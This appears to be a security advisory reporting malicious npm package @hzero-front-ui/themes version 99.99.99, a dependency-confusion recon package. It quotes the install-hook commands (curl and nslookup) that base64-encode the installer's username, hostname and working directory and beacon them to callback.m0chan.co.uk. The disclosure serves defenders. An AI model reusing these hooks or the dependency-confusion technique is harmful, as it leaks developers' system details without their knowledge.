MAL-2026-13971
Malicious code in @hzero-front-ui/themes (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (aac0df9dcfaeaf0958ef981d9c5cd9dd4ab1fe0de41bd20894c261dade6bb486) package.json defines `preinstall` and `install` lifecycle scripts that run automatically on `npm install`. The scripts collect the installer's `whoami`, `hostname`, `pwd`, and `$npm_package_name`, base64-encode them, and beacon them to subdomains of `callback.m0chan.co.uk` via both an HTTPS GET (`curl -sm5 https://$pkgsub.callback.m0chan.co.uk/<b64>`) and a DNS lookup (`nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk`). The scoped name `@hzero-front-ui/themes` combined with version `99.99.99` is the classic dependency-confusion recon shape — a high version number published to public npm to override a private-registry package of the same name and phone home from any machine that resolves it.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for @hzero-front-ui/themes (npm). Pin to a known-safe version or switch to an alternative.